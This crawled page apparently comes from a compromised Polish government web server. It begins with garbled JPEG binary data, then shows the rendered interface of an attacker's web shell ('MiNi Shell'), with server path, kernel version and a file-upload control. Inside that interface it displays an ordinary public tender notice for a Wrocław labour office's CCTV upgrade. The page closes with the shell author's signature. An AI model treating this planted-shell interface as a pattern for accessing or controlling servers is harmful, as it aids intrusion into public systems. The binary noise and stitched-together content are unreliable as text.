JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250926/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250926/0044494601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Modernizacja systemu monitoringu wizyjnego CCTV </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowy Urząd Pracy we Wrocławiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 932112482</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Gliniana 20-22</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">50-525</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi.it@pup-wroclaw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://wroclaw.praca.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja systemu monitoringu wizyjnego CCTV </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e7586d19-19d0-4ea7-810e-cba1276b8e7c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00444946</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00086778/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Modernizacja systemu monitoringu wizyjnego CCTV</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pup-wroclaw.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Niniejsze postępowanie jest prowadzone za pośrednictwem platformy przetargowej Powiatowego Urzędu Pracy we Wrocławiu i strony internetowej BIP Powiatowego Urzędu Pracy we Wrocławiu.<br/>2. Adres strony internetowej prowadzonego postępowania oraz adres strony, na której udostępnione będą zmiany, wyjaśnienia i inne dokumenty:<br/>https://pup-wroclaw.logintrade.net/rejestracja/ustawowe.htm <br/>https:/ pup.wroclaw.ibip.pl/public/<br/>3. Adres do logowania się do platformy przetargowej:<br/>https://pup-wroclaw.logintrade.net/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu o udzielenie zamówienia, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą odbywa się przy użyciu środków komunikacji elektronicznej za pośrednictwem platformy przetargowej https://pup-wroclaw.logintrade.net/ lub za pomocą poczty elektronicznej na adres: przetargi.it@pup-wroclaw.pl.<br/>2. Składanie ofert, odbywa się wyłącznie za pośrednictwem platformy przetargowej https://pup-wroclaw.logintrade.net/.<br/>3. Wymagania techniczne, jakie musi spełniać sprzęt Wykonawcy, aby mógł korzystać z platformy przetargowej:<br/>1) dopuszczalne przeglądarki internetowe: Edge, Google Chrome, Mozilla Firefox, Opera,<br/> 2) dostęp do sieci internet;<br/> 3) obsługa przez przeglądarkę protokołu XMLHttpRequest – Ajax;<br/> 4) włączona obsługa JavaScript;<br/> 5) zalecana szybkość łącza internetowego powyżej 500 KB/s;<br/> 6) zainstalowany Acrobat Reader;<br/> 7) zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy.<br/>4. Zamawiający rekomenduje na format danych przesyłanych plików: pdf.<br/>5. Postępowanie, którego dotyczy niniejszy dokument oznaczone jest znakiem: ZP.OI.3213.5.2025.<br/>6. Wykonawcy winni we wszelkich kontaktach z Zamawiającym powoływać się na wyżej podane oznaczenie sprawy.<br/>7. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w niniejszej SWZ. <br/>8. Wykonawca może złożyć wniosek o wyjaśnienie treści SWZ za pośrednictwem platformy przetargowej https://pup-wroclaw.logintrade.net/ poprzez funkcjonalność umożliwiającą zadawanie pytań zgodnie z Instrukcją pn. „Zadawanie pytań do przetargu”, dostępnej pod adresem https://pup-wroclaw.logintrade.net/rejestracja/instrukcje.html lub za pomocą poczty elektronicznej na adres: przetargi.it@pup-wroclaw.pl.<br/>9. Zaleca się, by Wykonawcy na bieżąco obserwowali stronę internetową prowadzonego postępowania: https://pup-wroclaw.logintrade.net/rejestracja/ustawowe.html i stronę internetową BIP, ponieważ w uzasadnionych przypadkach Zamawiający może przed upływem terminu składania ofert zmienić treść SWZ. Dokonaną zmianę SWZ Zamawiający udostępniani na stronie internetowej prowadzonego postępowania: https://pup-wroclaw.logintrade.net/rejestracja/ustawowe.html i stronie internetowej BIP.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Powiatowy Urząd Pracy we Wrocławiu (PUP) niniejszym informuje, że:<br/>1) Administratorem danych osobowych jest PUP we Wrocławiu z siedzibą 50-525 Wrocław, ul. Gliniana 20-22, w imieniu którego działa Dyrektor PUP we Wrocławiu. Adres korespondencyjny: 50 - 525 Wrocław ul. Gliniana 20-22, kontakt telefoniczny: 71 7701 600, adres e- mail: wrwr@pup-wroclaw.pl;<br/>2) Administrator wyznaczył Inspektora Ochrony Danych (IOD). We wszystkich sprawach dotyczących przetwarzania Pani/Pana danych osobowych oraz korzystania z praw związanych z przetwarzaniem danych można kontaktować się z IOD poprzez pocztę elektroniczną, którą należy kierować na adres: iod@pup-wroclaw.pl lub pisemnie na adres siedziby Urzędu;<br/>3) dane osobowe przetwarzane są na podstawie art. 6 ust. 1 RODO lit. c (wypełnienie obowiązku prawnego), art. 6 ust. 1 RODO lit. b (zawarcie i wykonanie umowy) oraz art. 6 ust. 1 lit. f (prawnie uzasadniony interes administratora – w ramach przetwarzania danych pracowników i/lub przedstawicieli wykonawcy w celu prawidłowej realizacji postępowania o udzielenie zamówienia publicznego oraz realizacji umowy);<br/>4) Administrator przetwarza dane osobowe w celu przeprowadzenia postępowania o udzielenie zamówienia publicznego oraz późniejszej realizacji zamówienia publicznego zgodnie z przepisami prawa z zakresu zamówień publicznych oraz finansów publicznych;<br/>5) podanie danych osobowych jest dobrowolne, jednak jest wymogiem niezbędnym do wzięcia udziału w postępowaniu o udzielenie zamówienia publicznego, a także zawarcia i realizacji umowy;<br/>6) dane osobowe zawarte w dokumentacji przetargowej są przekazywane Administratorowi przez Wykonawcę ubiegającego się o udzielenie zamówienia publicznego;<br/>7) dane osobowe przetwarzane przez Administratora, podlegają zabezpieczeniom zapobiegającym nadużyciom lub niezgodnemu z prawem dostępowi lub przekazywaniu;<br/>8) dane osobowe będą przechowywane przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 5 lat, okres przechowywania obejmuje cały czas trwania umowy; jeżeli w powyższych okresach, zostanie wytoczone powództwo lub zostanie wszczęte postępowanie, w którym przetwarzane dane osobowe stanowią dowód, okres przetwarzania, przedłuża się do czasu prawomocnego zakończenia tego postępowania;<br/>9) zgodnie z RODO osobie, której dane dotyczą przysługują następujące uprawnienia: prawo dostępu do treści danych osobowych (art. 15), prawo do sprostowania danych osobowych (art. 16), prawo do usunięcia danych (art. 17), prawo do ograniczenia przetwarzania danych osobowych (art. 18) oraz prawo do sprzeciwu wobec przetwarzania danych osobowych (art. 21). Uprawnienia wynikające z art. 17-21 mogą być ograniczone w sytuacjach kiedy Administrator jest prawnie zobowiązany do przetwarzania danych w celu realizacji obowiązków wynikających z przepisów prawa;<br/>10) dane przetwarzane przez Administratora mogą być udostępnione podmiotom upoważnionym na podstawie przepisów prawa oraz podmiotom realizującym usługi dla PUP we Wrocławiu, którym powierzono przetwarzanie danych osobowych w zakresie niezbędnym o realizacji ich zadań, a także podmiotom, którym w oparciu o przepisy ustawy Pzp zostanie udostępniona dokumentacja postępowania. W zakresie stanowiącym informację publiczną dane będą ujawniane każdemu zainteresowanemu taką informacją lub publikowane w BIP Urzędu.<br/>11) dane osobowe nie podlegają zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu.<br/>12) zgodnie z RODO oraz ustawą o ochronie danych osobowych, w przypadku gdy przetwarzanie danych osobowych narusza przepisy RODO, przysługuje prawo wniesienia skargi do Prezesa UODO.<br/>2. Wykonawca jest zobowiązany do przekazania klauzuli informacyjnej pracownikom, których dane osobowe będą udostępniane Zamawiającemu w celu przygotowania i złożenia oferty w postępowaniu o udzielenie zamówienia publicznego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.OI.3213.5.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 339923,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest modernizacja systemu monitoringu wizyjnego CCTV w budynku Powiatowego Urzędu Pracy we Wrocławiu, która będzie polegać na wymianie i rozbudowie połączeń kablowych, demontażu starych urządzeń wizyjnych, dostawie i montażu nowych urządzeń wizyjnych i sterujących, konfiguracji oprogramowania i urządzeń monitoringu wizyjnego oraz uruchomieniu systemu w siedzibie Powiatowego Urzędu Pracy we Wrocławiu przy ul. Glinianej 20-22. Celem modernizacji jest zastąpienie analogowego systemu przez system cyfrowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">35125300-2 - Kamery bezpieczeństwa</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">48730000-4 - Pakiety oprogramowania zabezpieczającego</p> <p class="mb-0">35120000-1 - Systemy i urządzenia nadzoru i bezpieczeństwa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">56 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Kryterium nr 1: Cena brutto (C), waga = 60 pkt<br/>Oferta o najniższej cenie brutto otrzyma 60 punktów. Pozostałe oferty zdobędą odpowiednią liczbę punktów wyliczoną według poniższego wzoru:<br/>C = Cn/Cb x W<br/>gdzie:<br/>C - liczba punktów przyznana danej ofercie w kryterium „Cena brutto”<br/>Cn - najniższa cena ofertowa brutto<br/>Cb – cena brutto badanej oferty<br/>W - waga = 60 pkt<br/><br/>Maksymalna liczba punktów jaką może uzyskać Wykonawca w tym kryterium to 60 pkt.<br/><br/>2. Kryterium nr 2: Termin wykonania zamówienia (T), waga = 40 pkt<br/>Oferta z terminem wykonania zamówienia do 42 dni od daty podpisania umowy otrzyma 40 punktów. Pozostałe oferty zdobędą odpowiednią liczbę punktów według poniższego<br/><br/>Zaoferowany przez Wykonawcę termin wykonania zamówienia	i Waga (pkt)<br/>1.	do 42 dni od daty podpisania umowy	40 pkt<br/>‍2.	od 43 do 49 dni od daty podpisania umowy	25 pkt<br/>‍3.	od 50 do 56 dni od daty podpisania umowy	10 pkt<br/><br/>1)W przypadku, gdy Wykonawca nie poda w „Formularzu oferty” informacji dotyczącej terminu wykonania zamówienia, jego oferta otrzyma 10 punktów. Zamawiający przyjmie jako deklarowany maksymalny termin wykonania przez Wykonawcę zamówienia od 50 do 56 dni od daty podpisania umowy.<br/>2)W przypadku zaś, gdy Wykonawca zaproponuje termin wykonania zamówienia powyżej 56 dni od daty podpisania umowy oferta jego zostanie odrzucona jako niespełniająca wymagań Zamawiającego.<br/>3) Maksymalna liczba punktów jaką może uzyskać Wykonawca w tym kryterium to 40 pkt.<br/> <br/>3. SUMA PUNKTÓW (S)<br/>Całkowita liczba punktów uzyskanych przez ofertę zostanie obliczona jako suma punktów otrzymanych w każdym kryterium według wzoru:<br/>S = C + T<br/>gdzie:<br/>S – całkowita liczba punktów badanej oferty<br/>C – liczna punktów przyznana ofercie w kryterium „Cena brutto”<br/>T – liczna punktów przyznana ofercie w kryterium „Termin wykonania zamówienia”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy:<br/>którzy spełniają warunki udziału w postępowaniu określone w art. 112 ust. 2 ustawy Pzp dotyczące: <br/>a) zdolności do występowania w obrocie gospodarczym – Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku,<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku,<br/>c) sytuacji ekonomicznej lub finansowej – Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku,<br/>d) zdolności technicznej lub zawodowej – Zamawiający stawia wymagania w zakresie spełnienia tego warunku:<br/>• Wykonawca spełnia ww. warunek jeśli posiada doświadczenie tj. wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał lub wykonuje w sposób należyty minimum jedną dostawę systemu monitoringu wizyjnego CCTV wraz z wdrożeniem lub modernizacją na kwotę co najmniej 300 000,00 zł brutto. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Oświadczenie, o którym mowa w art. 118 ust. 3 ustawy Pzp w przypadku podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia (w przypadku Wykonawcy, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby⁵) wg wzoru określonego w Załączniku nr 5 do SWZ);<br/>2) oświadczenia, o którym mowa w art. 117 ust. 4 ustawy Pzp w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, tj. oświadczenie, z którego wynika, jaki zakres przedmiotu zamówienia wykonują poszczególni Wykonawcy (wg wzoru w Załączniku nr 6 do SWZ);<br/>3) pełnomocnictwo (w przypadku, gdy oferta jest podpisana przez Pełnomocnika).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenia i dokumenty potwierdzające spełnianie warunków udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej:<br/>a) wykaz dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, zgodnie z wymogami zawartymi w dziale XIII ust. 1 pkt 2 lit. d SWZ wraz z podaniem ich przedmiotu, dat wykonania, wartości i podmiotów, na rzecz których, dostawy systemu monitoringu wizyjnego CCTV wraz z wdrożeniem lub modernizacją, zostały wykonane lub są wykonywane wg wzoru określonego w Załączniku nr 4 do SWZ wraz z dowodami określającymi, czy te usługi zostały wykonane lub są wykonywane należycie. Dowodami, o których mowa powyżej, są:<br/>i. referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane należycie lub są wykonywane, z tym że w odniesieniu do nadal wykonywanych dostaw referencje bądź inne dokumenty potwierdzające należyte wykonywanie dostawy powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert, lub<br/>ii. oświadczenie Wykonawcy – jeżeli z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów o których mowa w tirecie wyżej.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-07 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Na adres platformy przetargowej: https://pup-wroclaw.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-07 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-05</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com